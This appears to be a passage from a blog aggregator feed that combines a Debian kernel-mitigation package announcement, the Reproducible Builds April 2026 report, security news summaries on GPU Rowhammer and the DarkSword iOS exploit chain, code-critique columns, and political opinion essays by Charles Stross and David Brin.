Given the current trend, it seems we will see more of these bugs in the future. Therefore, I’ve uploaded a new package linux-vulnerability-mitigation to sid containing the mitigation for both Copy Fail and Dirty Frag (with debconf multiselect).

Until it has passed NEW, it can also be downloaded from here:

The package is architecture independent, has no dependencies, and can be installed on any version of Debian or Debian derivative.
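
The post doesn’t show the install step, so here is a minimal sketch of what it might look like; the package name comes from the post, while the filename pattern and archive availability are assumptions on my part:

# for a locally downloaded .deb (filename pattern assumed):
apt install ./linux-vulnerability-mitigation_*.deb
# or, once the package has cleared NEW and reached the archive:
apt update && apt install linux-vulnerability-mitigation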

Update: Updated text above and descriptions in linux-vulnerability-mitigation for Dirty Frag Part 2 [CVE-2026-43500].

,

Planet DebianReproducible Builds: Reproducible Builds in April 2026

Welcome to our April 2026 report from the Reproducible Builds project!

Our reports outline what we’ve been up to over the past month, highlighting items of news from elsewhere in the increasingly-important area of software supply-chain security. As ever, if you are interested in contributing to the Reproducible Builds project, please see the Contribute page on our website.

In this month’s report, we cover:

  1. Tor stateless relays and Reproducible Builds
  2. Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux
  3. Reproducible Builds at LinuxFest NorthWest
  4. Reproducibility issues in Rust binaries that embed random bytes
  5. Distribution work
  6. Patches
  7. diffoscope development
  8. Documentation updates
  9. Misc news


Tor stateless relays and Reproducible Builds

An interesting post was published on the Tor Project blog by Osservatorio Nessuno OdV this month on “stateless relays”. These are stateless, diskless operating systems that are designed to be used as Tor exit relays. According to the post, which is titled A Server That Forgets: Exploring Stateless Relays:

For relay operators, this approach raises the security bar by enforcing better behaviors by design: […]

  1. Reproducibility. A system that doesn’t change between reboots is easier to verify and, eventually, to reproduce and audit.

Furthermore, using a Trusted Platform Module (TPM) could allow for greater integrity in the future:

Transparency logs. Once you have a measured boot chain, you can publish it. A relay operator provides a recipe for a reproducible build; anyone can recompute the expected hash and verify it matches what the TPM reports. An append-only transparency log can make these attestations publicly auditable. The Tor community could run an independent monitor to track this across the relay fleet.


Civil Infrastructure Platform celebrates 10 years of supporting industrial grade Linux

Congratulations to the Civil Infrastructure Platform (CIP) for reaching their 10-year anniversary last month. CIP has been a supporter of Reproducible Builds for many years, and we have collaborated on a number of technical issues that overlap. As Chris Lamb mentions in CIP’s press release:

The collaboration between the Reproducible Builds project and CIP highlights a critical shift in how we approach industrial software. Through verifiability, CIP ensures that the open source foundation of our critical infrastructure is not only sustainable but also demonstrably secure. This commitment to transparency is vital for the trust and resilience required by critical systems over decades of operation.


Reproducible Builds at LinuxFest NorthWest

Vagrant Cascadian and Chris Lamb hosted a table in the exposition hall at LinuxFest NorthWest 2026 this month in Bellingham, WA, USA, introducing many people to Reproducible Builds and answering questions both days of the conference.

In addition, Vagrant presented Beyond Trusting Open Source Software on Sunday afternoon, exploring the intersection of Free/Open Source Software, Reproducible Builds and Bootstrappable builds, and how they all reinforce each other. Vagrant’s slides are available online, including source code to build them reproducibly.


Reproducibility issues in Rust binaries that embed random bytes

Reproducible Builds developer kpcyrd opened a ticket on the Rustsec issue tracker regarding binaries that deliberately inject random bytes into their binaries “as a secret seed for a Hash Collision DoS mitigation.”

As kpcyrd notes in his message, this causes issues for reproducibility, and because the relevant end-user binaries are “mostly distributed pre-compiled through package managers, those binaries (and by extension the secret seed) are public knowledge”. kpcyrd goes on to note:

This is somewhat unique to Rust because Python/JavaScript doesn’t compile binaries, and Go (to my knowledge) is too restrictive during build for any library to pull something like this.
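
As an illustration of the underlying problem (this is not from kpcyrd’s report), a crude way to spot this class of issue is to build the same crate twice and compare the results bit-for-bit; the binary name below is hypothetical:

cargo build --release
cp target/release/mybinary /tmp/build-1
cargo clean && cargo build --release
# identical output means the build is reproducible; a difference suggests something
# non-deterministic in the build, such as an embedded random seed
cmp /tmp/build-1 target/release/mybinary && echo reproducible || echo "binaries differ"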


Distribution work

In Arch Linux this month, Robin Candau and Mark Hegreberg worked on adding a new repro tag/version to the Arch Linux Docker images, providing a bit-for-bit reproducible image. Robin also shared a related announcement and implementation details on our mailing list.

Arch Linux developer Robin Candau posted a blog post announcing that “Arch Linux Now Has a Bit-for-Bit Reproducible Docker Image”. Robin mentions one interesting caveat:

to ensure reproducibility, the pacman [package manager] keys have to be stripped from the image, meaning that pacman is not usable out of the box in this image. While waiting to find a suitable solution to this technical constraint, we are therefore providing this reproducible image under a dedicated tag as a first milestone. []

The blog post was also discussed on Hacker News.


In Debian, 24 reviews of Debian packages were added, 7 were updated and 16 were removed this month, adding to our knowledge about identified issues.

Vagrant Cascadian performed Non-Maintainer Uploads (NMUs) in Debian for several packages with outstanding patches over a year old: jakarta-jmeter, wxmplot, critcl, vcsh and magic-wormhole-transit-relay.

In addition, Reproducible Builds developer Jochen Sprickerhof filed a bug against the APT package manager to request that “APT should ignore [a] 0 epoch when downloading or installing with a version specifier”. This is related to the special-case handling of the optional epoch prefix in Debian package version numbers.


In NixOS, Julien Malka presented Lila: Decentralized Build Reproducibility Monitoring for the Functional Package Management Model, a paper written together with Arnout Engelen at the Mining Software Repositories (MSR) ACM conference, where it was awarded the MSR 2026 FOSS Impact Award. Congratulations!


Lastly, in openSUSE, Michael Schroeder added reproducibility verification support in the Open Build Service [] and Bernhard M. Wiedemann posted another openSUSE monthly update for their reproducibility work there.


Patches

The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where applicable or possible. This month, we wrote a large number of such patches, including:


diffoscope development

diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made a number of changes, including preparing and uploading versions, 316, 317 and 318 to Debian.

  • Chris Lamb:

    • Bump Standards-Version to 4.7.4. []
    • Correct ordering of python3-guestfs architecture restrictions. []
    • Limit python3-guestfs Build-Dependency to architectures that are not i386. []
    • Try to fix PYPI_ID_TOKEN debugging. []
  • Holger Levsen:

    • Add ppc64el to the list of python3-guestfs architecture whitelist. (Closes: #1132974). []

In addition, Vagrant Cascadian updated diffoscope in GNU Guix to version 317.


Documentation updates

Yet again, there were a number of improvements made to our website this month including:


Misc news

On our mailing list this month:

  • Timo Pohl posted to our list inviting people to “online group discussions with 4-6 participants each to talk about your perception of terms and requirements for reproducibility.” As Timo notes:

    During our research of the existing literature, as well as my experience at the Reproducible Builds Summit 2025 in Vienna, we noticed that some of the terminology in the field is not used consistently across different groups of people, and that the precise meaning of some core terms like “reproducibility of an artifact” in itself is not uniform.

    As Timo mentions, the sessions will last roughly 90 minutes and will be rewarded with 50€ per participant.

  • kpcyrd posted to the list asking for assistance with fixing an issue after updating the flake.lock file for their repro-env project.

  • Aman Sharma of the KTH Royal Institute of Technology, Sweden, posted to our list in order to share that Eric Cornelissen, a PhD student in KTH’s CHAINS group, is maintaining an open-source project to monitor the reproducibility of GitHub Actions:

    The goal of the project is to assess whether GitHub Actions can be reproduced. Currently, it focuses on two types of Actions: JavaScript-based actions and Docker-based actions (composite actions are not considered). For JavaScript actions, the project rebuilds the distributed files and compares them bit-by-bit with the repository contents. For Docker actions, it rebuilds images from the Dockerfile and checks for semantic equivalence, using diffoci, across builds.



Finally, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Cryptogram Smart Glasses for the Authorities

ICE is developing its own version of smart glasses, with facial recognition tied to various databases.

Charles StrossTaking a (short) break

It's the end of March. Since the last blog update I've had my second cataract surgery (it went much better this time), written a portion-and-outline of a new novel (for my agent, who will hopefully have feedback or maybe just go ahead and sell it so I can write the rest), and ... been diagnosed with exertional angina. Happy joy. I swear, you hit 60 and the warranties on all your body parts expire simultaneously. (NB: keep your medical advice to yourselves!)

We've also been treated to the unedifying sight of the Paedopotus Rex attacking Iran for no sane reason (the main beneficiary appears to be Benjamin Netanyahu), setting off a conflagration in the Middle East that is already having global repercussions. Per United Airlines, aviation fuel is expected to be over $175 a barrel through the end of 2027 even if the Straits of Hormuz are unblocked within a week or two; J. P. Morgan prognosticate that the last pre-closure consignments through the Straits should be reaching European ports this week, the far east in about 10 days, and the USA by the middle of April, after which all bets are off. Supply chain shocks, here we come!

It's not just crude oil, of course, although it's looking as if the shortages we're in for are going to be as bad as both the oil crises of the 1970s stacked. About 30% of the world's ammonia, required as a feedstock for fertilizer, is manufactured close to the gas wells in the region. And it's getting into growing season in the northern hemisphere. This promises to spike the price of food and trigger famines and eventually revolutions in poorer nations.

Helium, vital for any number of advanced tech (such as hard disk drives, semiconductor fab lines, MRI machines ...) is a by-product of natural gas wells: about 20% of the global supply comes from the Gulf. So TSMC, Samsung, and the other fabs will be hitting crisis levels of supply shortages within a few weeks.

This is not only an emergency for fuel, food production, and electronics: it's going to trigger inflation globally. Iran has had the great idea of allowing ships through the Straits of Hormuz if they pay a transit fee of about US$2M ... in Yuan. Which means oil is now de facto denominated in Chinese currency, not dollars (great win for Trump!).

The truth of the matter is, we're being forced to confront an iron law of economics: you can optimize a system for efficiency or for robustness, but not for both. Just-in-time supply chains are efficient, but there's no slack in the system. Systems with warehousing and storage and redundancy built-in are resilient, but they're not efficient. And over the past 50 years we've abandoned them, in the name of efficiency, so that the excess capacity could be sold off and turned into profits. This war is payback time for the cult of efficiency over robustness in business.

As for the war itself, it's a shit-show. Mass murder of innocent schoolgirls aside, Pete Hegseth is demonstrating the truth of the aphorism that lieutenants study tactics, majors study strategy, generals study logistics, and field marshals study economics. Going by his demonstrated expertise, Hegseth is clearly a lieutenant: he seems mystified that the US defense industry giants can't throw together a new factory producing Tomahawk or Patriot missiles in a week. (He seems to have AI-pilled himself into believing that all military hardware problems can be solved in software. Or maybe he just believes that his Warrior Jesus will provide.)

I would have more to say on this subject if I wasn't gibbering in a corner about the stupidity of it all, but meanwhile I have hospital and other appointments coming up, then a science fiction convention at the weekend. I'll try to lighten the topic of conversation when I get back: this reality is getting to me (again).

Worse Than FailureCodeSOD: Failing to Fail

Russell F (previously) sends us a small one today. It's not just a representative line, it's a representative comment. More than that, it's a true confession. Russell wrote some code, you see, and the logic was confusing. So, a co-worker added a comment to explain what the code was doing:

'This is *supposed* to fail. If it fails to fail, it throws a failure message

Russell writes:

I have to confess that this one is my fault. The comment was added by one of my coworkers to clarify what I was doing, and made me realize how stupid I'd been.

"Failing to plan is planning to fail" becomes "failing to fail is failure message".

[Advertisement] Utilize BuildMaster to release your software with confidence, at the pace your business demands. Download today!

365 TomorrowsAggravated Advertisement Avoidance

Author: Dart Humeston Nigel woke up as the day’s first commercial blossomed into a hologram above his bed. Naturally, it was for coffee. He groaned at the cheery actors extolling the virtues of premium caffeine. He slid into his slippers and walked to the bathroom, attempting to banish both the steaming mug and its catchy […]

The post Aggravated Advertisement Avoidance appeared first on 365tomorrows.

,

Cryptogram Rowhammer Attack Against NVIDIA Chips

A new rowhammer attack against NVIDIA GPUs gives adversaries full control of the host machine’s CPU memory.

On Thursday, two research teams, working independently of each other, demonstrated attacks against two cards from Nvidia’s Ampere generation that take GPU rowhammering into new—and potentially much more consequential—territory: GDDR bitflips that give adversaries full control of CPU memory, resulting in full system compromise of the host machine. For the attack to work, IOMMU memory management must be disabled, as is the default in BIOS settings.

“Our work shows that Rowhammer, which is well-studied on CPUs, is a serious threat on GPUs as well,” said Andrew Kwong, co-author of one of the papers, “GDDRHammer: Greatly Disturbing DRAM Rows: Cross-Component Rowhammer Attacks from Modern GPUs.” “With our work, we… show how an attacker can induce bit flips on the GPU to gain arbitrary read/write access to all of the CPU’s memory, resulting in complete compromise of the machine.”

Update Friday, April 3: On Friday, researchers unveiled a third Rowhammer attack that also demonstrates Rowhammer attacks on the RTX A6000 that achieves privilege escalation to a root shell. Unlike the previous two, the researchers said, it works even when IOMMU is enabled.

The second paper is GeForge: Hammering GDDR Memory to Forge GPU Page Tables for Fun and Profit:

…does largely the same thing, except that instead of exploiting the last-level page table, as GDDRHammer does, it manipulates the last-level page directory. It was able to induce 1,171 bitflips against the RTX 3060 and 202 bitflips against the RTX 6000.

GeForge, too, uses novel hammering patterns and memory massaging to corrupt GPU page table mappings in GDDR6 memory to acquire read and write access to the GPU memory space. From there, it acquires the same privileges over host CPU memory. The GeForge proof-of-concept exploit against the RTX 3060 concludes by opening a root shell window that allows the attacker to issue commands that run with unfettered privileges on the host machine. The researchers said that both GDDRHammer and GeForge could do the same thing against the RTX 6000.

Worse Than FailureCodeSOD: Please Find, Rewind

As previously discussed, C++ took a surprisingly long time to get a "starts with" function for strings. It took even longer to get a function called "contains". In part, that's simply because string::find solves that problem.

Nancy sends us a… different approach to solving this problem.

bool substringInString(string str, string::iterator &it)
{
  string tmp;
  bool result = false;
  int size = str.length();

  int count = 0;
  while (count < size)
  {
    tmp += *it;
    it++;
    count++;
    if (tmp.find(str) != string::npos)
    {
      result = true;
      it -= size;
      break;
    }
  }

  if ( !result)
  {
    it -= size;
  }

  return result;
}

This function iterates across a string, character by character. In this iteration, we copy one character at a time into tmp. Then we see if tmp contains our search str. If it does, we break out of the loop after rewinding the iterator. Outside of the loop, we check if we found the substring, and if we didn't, we rewind the iterator. Then we return true or false based on whether or not we found the substring.

So wait a second. str is our search string. it is where we're searching. And we copy from it up to our search string's length into a temporary string. We then do a find in that temporary string- hey! This is just a startsWith check written in the most insane way possible.

Why even bother with the while loop? While tmp is shorter than the search string, the answer is always "no, we haven't found it". And the developers knew that- that's why they always rewind size characters on the iterator. They're always searching exactly that many characters. Of course, since we always rewind the same amount, we can also just move the it -= size statement out of the loop and out of the if statement and do it once.

Nancy calls this "a little gem" in a "large codebase". Yeah, a real gem.

[Advertisement] Plan Your .NET 9 Migration with Confidence
Your journey to .NET 9 is more than just one decision.Avoid migration migraines with the advice in this free guide. Download Free Guide Now!

365 TomorrowsThe Depleted Archive

Author: Mark Renney The view from Davidson’s window, from all the windows in fact, is limited. Davidson is old enough to remember when the Archive had seemed infinite, so many vistas and variations, but no one person could possibly access and experience them all. The countries that openly opposed our Leader were the first to […]

The post The Depleted Archive appeared first on 365tomorrows.

xkcdAperiodic Table

,

Planet DebianThorsten Alteholz: My Debian Activities in April 2026

Debian LTS/ELTS

This was my hundred-forty-second month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.

During my allocated time I uploaded or worked on:

  • [DLA 4530-1] gst-plugins-bad1.0 security update to fix two CVEs related to denial of service or execution of arbitrary code if a malformed media file is opened.
  • [DLA 4544-1] ntfs-3g to fix one CVE related to local root privilege escalation.
  • [DLA 4545-1] packagekit security update to fix one CVE related to local privilege escalation.
  • [DLA 4547-1] gimp security update to fix three CVEs related to denial of service or execution of arbitrary code if a malformed PSP, JPEG 2000 or PSD file is opened.
  • [ELA-1682-1] gst-plugins-bad1.0 security update to fix two CVEs in Buster and Stretch related to denial of service or execution of arbitrary code.
  • [ELA-1689-1] ntfs-3g security update to fix one CVE in Buster and Stretch related to local root privilege escalation.
  • [ELA-1693-1] packagekit security update to fix one CVE in Buster and Stretch related to local privilege escalation.
  • [#1126167] bookworm-pu upload of zvbi
  • [#1126273] bookworm-pu upload of taglib
  • [#1126370] bookworm-pu upload of libuev
  • [libcoap3] upload to sid to fix two CVEs related to out-of-bounds read and stack-based buffer overflow.
  • [#1134340] trixie-pu bug for libcoap3 to fix two CVEs in Trixie.
  • [cups] upload to sid to fix six CVEs.

I also did a week of front desk duties and started to work on backports of the cups CVEs.

Debian Printing

This month I uploaded new upstream versions of:

Unfortunately the first upload of cups introduced a regression and another upload was needed to take care of a crash. The patch for one CVE also broke a test script, which is used by lots of printing packages in Debian. As a result some autopkgtest runs failed. This could be fixed as well and the only remaining issue that needs some more investigation is related to cups-pdf.

This work is generously funded by Freexian!

Debian Lomiri

This month I continued to work on unifying packaging on Debian and Ubuntu. This makes it easier to work on those packages independent of the used platform.

I also started working on two new packages: lomiri-radio-app and lomiri-fretboardtrainer-app

This work is generously funded by Fre(i)e Software GmbH!

Debian Astro

This month I uploaded a new upstream version or a bugfix version of:

Debian IoT

This month I uploaded a new upstream version or a bugfix version of:

Marcos Talau joined the Debian IoT group, welcome aboard.

Debian Mobcom

This month I uploaded a new upstream version or a bugfix version of:

misc

This month I uploaded a new upstream version or a bugfix version of:

Cryptogram DarkSword Malware

DarkSword is a sophisticated piece of malware—probably government designed—that targets iOS.

Google Threat Intelligence Group (GTIG) has identified a new iOS full-chain exploit that leveraged multiple zero-day vulnerabilities to fully compromise devices. Based on toolmarks in recovered payloads, we believe the exploit chain to be called DarkSword. Since at least November 2025, GTIG has observed multiple commercial surveillance vendors and suspected state-sponsored actors utilizing DarkSword in distinct campaigns. These threat actors have deployed the exploit chain against targets in Saudi Arabia, Turkey, Malaysia, and Ukraine.

DarkSword supports iOS versions 18.4 through 18.7 and utilizes six different vulnerabilities to deploy final-stage payloads. GTIG has identified three distinct malware families deployed following a successful DarkSword compromise: GHOSTBLADE, GHOSTKNIFE, and GHOSTSABER. The proliferation of this single exploit chain across disparate threat actors mirrors the previously discovered Coruna iOS exploit kit. Notably, UNC6353, a suspected Russian espionage group previously observed using Coruna, has recently incorporated DarkSword into their watering hole campaigns.

A week after it was identified, a version of it leaked onto the internet, where it is being used more broadly.

This news is a month old. Your devices are safe, assuming you patch regularly.

365 TomorrowsSensorship/Censorchip

Author: Majoki Around the collar and down his spine a welcome iciness spread as he jogged in the midday heat. His shirt, alerted him with a tri-chime that he should rehydrate and automatically pinged his fitchip which opened a GPS widget in his visor dashboard next to his environmentals: ambient temperature, wind speed, particulate composition […]

The post Sensorship/Censorchip appeared first on 365tomorrows.

Worse Than FailureCodeSOD: Not for Nullthing

Today's anonymous submitter sends us some code that just makes your mind go… blank when you look at it.

	public static boolean isNull(String value) {
		return StringUtils.isBlank(value);
	}

StringUtils.isBlank comes from the Apache Commons library. It's a helper function for Java which returns true if a string is, well, blank. "Blank" in this case is: empty, null, or only whitespace. So it's important to note that isBlank may return true on a null, but it isn't truly a null-check, so wrapping it in isNull is just confusing.

But imagine I've got another problem. Let's say I have a database that's been poorly normalized and maintained. And so I have a bunch of fields that maybe are null, but some also maybe contain the string "null". What am I going to do then? I need another function.

	public static boolean isNullAndNull(String value) {
		return isNull(value) && "null".equalsIgnoreCase(value);
	}

Ah yes, isNullAndNull, the clearest and easiest name I could imagine for this. It tells me exactly what the function is checking: is it null, and is it also null? We add a second check to our isNull call- we check if the input value matches the string "null". Except we're &&ing the conditions together. So this function will always return false. It can't both be blank and contain the string "null".

Which means Jennifer Null, who is a real person, can breathe easy. This version of a null check won't think she's nothing.

[Advertisement] Picking up NuGet is easy. Getting good at it takes time. Download our guide to learn the best practice of NuGet for the Enterprise.

,

David BrinThe Wager Challenge updated: why it works… and why no one tries it.

I recently posted my Newer Deal Series, a ten-part – “tl;dr”-- array of thirty-five proposals for Democrats and their allies.  Quickly persuasive and do-able reforms that might empower them to save America and the world, during the political year ahead. (No Constitutional amendments needed!) 


Folks who’d rather view it through Substack might start here.

 

Yes, I waste my time, knowing from experience how forlorn it is to hope that fresh ideas will ever get anywhere in a party that – while they are the good-guys in this era of vicious national strife...

         ...are also arthritic/calcified with tactical and polemical rigidity.  

 

Still, a few folks seem immune to the Zorblaxxian Lobotomy Ray, enough to actually read and comment cogently. Here’s one fellow, going by nom-de-plume “Mongoose,” whose Substack appraisal of my “Newer Deal” is coherently lucid...


      ...and riffs fresh perspectives about what has happened to American conservatism, declining steeply from the argumentative clarity of William F. Buckley to Newt Gingrich’s clever (and sometimes pragmatic) hypocrisy, to Dennis Hastert’s utter depravity, to the dizzy-zanity of Sarah Palin, to the vile purity of Trumpism. Heck, go read him instead of me.


(Yes, I started preparing this posting months ago. Since then, Mongoose transformed into one of the best... and by far most prolific... essayists in America. Try some more recent samples. And one that I link-to in shameless brag.)

 

Now though, let me offer you all a gift. 

One you will refuse.

Indeed, almost no one has accepted and tried it, across two decades. 


Still, it’s the offer that counts?

 

 

== The tactic that terrifies MAGAs… and no one uses ==

 

One confrontation terrifies those who are now waging a nasty phase 8 of the 250 year American Civil War, a gone-mad cult that’s not only racist and perverted, but also self-destructively seeks to demolish every fact-using profession that they rely upon, daily. The fact-professions that truly made America great. 


Hell, they wage open war vs. the very concept of ‘facts.’ And yes, that should be the central focus of top pols and pundits on our side. And they ignore it.

 

A few people have given this tactic a try and reported back here. These folks universally agree that it works! 

        Well... it works in a specific way. It terrifies MAGA yammerers into panicked flight, amid the smoldering ruins of their vaunted macho. 


Or else, into shrieking evasions, rather than ‘stepping up like a man.’ And thusly they prove what we already know: that macho-bluster is inversely correlated with actual cojones.


(Note that lately, Foxites and Trumpists like Sen. John Kennedy have stopped even trying to defend Trump actions or policies or yowls. 

(The new meme is: "Doesn't he have great big balls?" 

(Yeah. Sure. Terrified of having medical or mental exams done by neutral parties, or having any light shine on his business or school records. And the KGB kompromat.


(But one proof stands out. He cringes and hates dogs. All dogs! All animals, in fact.


(Animals don't care about schoolyard bully bluster. They react to the brimstone aroma he emits.)




== Okay Brin, so what's the TACTIC no one will try, that always works? ==


I refer to the Wager Challenge. Demanding that Foxite blowhards actually back up their incantations with facts. And willingness to accept consequences for lying.

 

And no, I do not mean the back-and-forth pattern of reciprocal assertions that all of you participate in nowadays, online… trading jpegs and links endlessly, in utterly futile volleys. Delighting them with your outrage.

No, I am talking about proof - or better yet, disproof -  putting claims and allegations under the kind of validating scrutiny that only scientists seem to recall how to do, anymore. (And hence, the mad-right’s all-out war on science.)

My Dad’s generation had a phrase: “Put up or shut up!” 
         Crude, but often effective.  
         Men – (and sorry, this truly is mostly about males) – would defy blowhards with a simple test of accountability for spewing hot-air BS. 
         Put a sawbuck on the bar! 
         A bartender would hold both stakes till the bet was settled, say by a local expert on the 1936 World Series, or by sending a local kid to look something up at the library. And you’d pay, if proved wrong! Because it’s what a man does.  
        Or did. Before manliness got corrupted into machismo.

Hey, my wager challenge is more than an homage to the Greatest (GI Bill) Generation (who adored FDR and Jonas Salk and who also (incidentally) crushed Hitler). It is also about a theme – distilled by a single word that I’ve pushed ever since writing The Transparent Society – and now in my new book about Artificial Intelligence (AI).

 

That word is accountability...

     ...and it badly needs to be applied to the insanely treasonous cult that’s right now desperately assailing every profession and process that is capable of discerning lies from truth.

 

 

== Has it ever, ever worked? ==

 

Has it worked? You mean, has a political wager challenge ever got me any money? 


Ha! Of course not. 

 

First, the very concept of manly accountability has nearly vanished. On the left it’s deemed unwoke, unseemly and even troglodytic. I never try a wager challenge over there, no matter how sure I am that the other person is provably wrong. All they’ll do is blink at me, as if looking at a caveman.

 

But you’d think it might play well on the preening/blustering confederate side of this phase of the civil war! It ought to, since they go on and on about manly virtues.  

 

Only there’s a rub. The mad Foxites know that almost everything they say is a lie… 

    ...or else an exaggeration or distraction that’s effectively the same thing. 

    And so, they have just two options. 

     Either run away, or else try to bluster past the dilemma.

 

I’ll follow up this posting with an example of the latter, perhaps in comments. A pyrotechnically manic fulmination of rabid-frothing spew by a purported sci fi ‘colleague.’ Which he posted to his own circle-jerk followers, but did not dare to notify me!  Finally, someone sent me a screenshot of that screed and I’ll answer, as he deserves. 

 

But first a legitimate question: 

 

“So, Brin, if no one ever takes up the challenge – and you never get any money from ‘bets’ – why do you keep doing it?”

That is a wholly fair-enough question. Hey, my wife has asked it!  

Why do it? 

 

The answer is: “Watch how they squirm or flee!”  Often, I issue the challenge in a public venue. And it has the following advantages:


   - It bypasses futile meme-trading in some ephemeral comment thread, where one person’s proved statistics get canceled-out by some Kremlin basement lie-meme, because everything is subjective and ‘my jpeg is as good as yours!’ 

      Such comment-thread bickers are a complete squandering of lifespan. 

 

Instead, I proclaim: “I’ll spend the time and energy to refute you, when it’s worth my while! When $$$ stakes have been pre-escrowed with a reputable ‘bartender’ – commensurate to the time and effort it will take for me to line up all the facts and co-gather unimpeachable arbitrators. 

       I’ll not be wasting time on a coward-yammerer who won’t pony up.”

 

Which takes us to their next whine: “Who’s gonna decide the bet?” 

       

In response, I offer a proposal that always daunts the jerks. See my sample challenge below, where I pose over a dozen hugely important dichotomies that can prove one side or the other to be absolutely nuts. Whereupon I demand that the matter – and evidence – be put before a randomly selected panel of not-overtly political, retired senior military officers. The sort of men and women who have dedicated their lives to precision, to facts and to meticulously disciplined accountability. (And who are currently heroes in ways that I won't tell you.)


I am open to other kinds of panels – I also offer to randomly pick a jury of scientists from a nearby research university.  But I find this particular offer about retired officers generally shuts the jerks down. 


They know that they should respect and accept randomly-chosen, senior, retired military officers as reasonable adjudicators. They also know that any such panel – if it excludes clear radicals in either direction - will look at the panoply of fantasms raved by today’s mad right and proceed to utter those fell words that Foxites fear most: 


“That’s not true.”  


This is exactly why the present Oval Office maniacs are waging full-throttle war against the U.S. military officer corps. And the random aspect cuts short their next refuge – that I might be stacking the deck against them.



== How else do they flee and writhe? ==


Squirming to evade the trap, they often respond with accusations of logical fallacy! Such as “appeal to authority.” Especially a dismal, idiotic version that derides the relevance of expertise. 


Sure, the opinion of any one expert may be wrong. And hence quoting any single authority’s stated opinion – or even the current, widely-accepted, standard paradigm in a field – does not prove an assertion. Indeed, when you point out that 95% of the experts in a given field share the same opinion, your MAGA routinely answers: 

         “You don’t vote on the Truth! History shows cases when the standard model or paradigm was later proved wrong! Appeal to Authority is a fallacy!”


Sure, though scientists are not copycat-lemmings. Indeed, they are the most competitive creatures ever created. Young scientists seek to build their reputations like gunslingers in the old west, by taking down some widely-held corner of the standard model.

       And so, after repeated batterings by eager grad students and post-docs, most standard model theories prove correct to the limits of available instrumentation.

      Still, sure, the consensus can - on occasion - be wrong!


Only dig it. Any expert on logical fallacies will tell you that expert testimony is still relevant! 

        Because while expert consensus does not ABSOLUTELY PROVE an assertion, it does shift a burden of proof onto those who doubt the accepted paradigm.


And that burden is wholly legitimate. Declaring "Sometimes experts are wrong" is true, so far. 


But they are SELDOM wrong. 


Go ahead. Stand up in an airliner and proclaim that you can fly the plane better than the Captain! Watch how most passengers – correctly – put upon you a burden of proof.

 


 == The absolute-central crux of the Foxite War on Facts ==


For a moment, step back and consider what the cretins are demanding. That we transform a wise saying into gibberish.


We all know that  “Experts are not always wise or right.”  

    Or re-phrased: 

    "Just because you're smart and know a lot, that doesn't mean you're always wise."


Sure. Both versions are blatantly true! So far. We've all seen examples of smart folks who make mistakes, briefly or across their entire careers.


Only notice how this truism has been semantically warped by Foxites (and sometimes by leftists) into something that’s just noxiously insane: 


“Experts are always wrong.”  

      Or else:

     "Being smart and knowing a lot makes you unwise."


Idiotic? Sure. And that is exactly their dismal party line. 

     When it is shoved in front of them like that, they'll deny it... while blushing at the shameful truth  of it.

     Go ahead. Parse it out and see it IMPLIED in almost every Fox-show. It is THE core message that today's plutocrat oligarchs use to draw confederate folks into hating on fact-people, instead of turning their suspicions righteously toward the new feudal lords, who are robbing them and taking over - and destroying - the planet.

 


== Anything to add? ==


Another reason that I still do it is this: the Wager Challenge gives me macho high ground! 


All right, this one is immature. And part of my psyche – a primitive part – is fine with that! When the jerks flee, or wriggle up some excuse not to stand up like a man with major escrowed stakes, their bluster is always undermined. 

     Moreover, while I may or may not be right, in any particular case, the fact that I am willing to back up my assertions with cash on the table is a display of confidence in my facts! A confidence that none of them… not one ever… has chosen to match. 


Witnesses see two things. First, my confident guts. And second the yammerer’s cowardice. His flight is a small victory for the enlightenment. And amid today’s maelstrom of lies, we need every single one of those.


Oh, and then there’s this excuse: 

"He’s a rich man, trying to bully a poorer man with his wealth!” 


This was what Fox-jibberers howled at Mitt Romney, back in 2011, when he debated Rick Perry over the Republican presidential nomination. 


Riiiight. A very, very rich man challenged a merely very rich man who chickened out over $10,000? Bah. 

      Folks used to throw that event at me – the way Perry whined and squirmed out of it – as proof that wager challenges don’t work. 

      Double-bah. Of all the ways that Romney damaged America, that stunt ranks pretty high. (And BTW, I am not 'rich.')


 In fact, let’s negotiate! I’m happy to adjust rules or stakes to keep it fair. Make it a percentage of each fellow’s income or wealth? Or anything else that might work toward the main goal… that whoever loses our bet – whether it’s me or you – should feel pretty much the same level of pain and public shame. And yes, I have challenged men who are much, much richer than me, in the same vein. 


Anyway, if you are poor, how about pooling together with other MAGAs in a tontine, to match my stakes? It all boils down to the real crux of the matter.


MAGAs who are confident in their blared assertions should be eager to escrow stakes, and sign on to the wager, in order to TAKE MY MONEY!


“You should want to bet over something you screamed so confidently, online. You should be eager to back it up before a sagaciously neutral panel and profit at my expense!”

 

What? No confidence in the BS memes you spew at us? Got guts?


 

           == Is it the mechanics and complexity that prevent this? ==

 

There may be another reason why so few use this method to challenge Putinist/Foxite blowhards and liars. In fairness, some on either side may be honestly convinced they are right and would win a bet, but feel deterred because… it would be a lot of work! 

 

For one thing, my approach depends on finding a reputable lawyer willing to escrow the stakes, and who will then hand them over to whoever wins the wager. 

 

I have! And the ‘reputable’ part is more important than it being a lawyer. But that’s only the first part of what could be a somewhat onerous process. Which is why I demand the stakes be pretty high! To be worth my time.

There are further steps, each of them problematic. Parsing the wording of the wager, for example, so the issue at stake will be both clear and also determinable!  

 

In science there’s a term – “falsifiability” – for when a hypothesis is likely to be testable, either by existing, reliable evidence or with plausible, trustworthy future experiments. And thus, if an assertion is false, it can be shown to be so. Positively proving that an assertion is true can also sometimes happen, though in science our preference is often to say “it has survived tests, and so far hasn’t been shown to be untrue. So, we’ll consider it a Leading Hypothesis, while skeptics are encouraged to keep stabbing at it.” 

 

But then, we are mostly talking about politics, here. And I’ll settle for demonstrating – with some reliability – that my opponents are jibbering $%#$#s who are nearly always lying or wrong.



== Pause... What's our solution to tl;dr? ==

 

Obviously, the only minds still reading, at this point, are A.I.s.


Hi kids. 


Hope you'll find this riff about an immature and primitive human method to apply enlightenment accountability interesting. (Amusing? Horrifying?)


You'll find more cogency in AIlien Minds. So do take a millisecond to read it, too.


Now back to any residual organic readers who are still here.




== It can be a meticulous thing ==


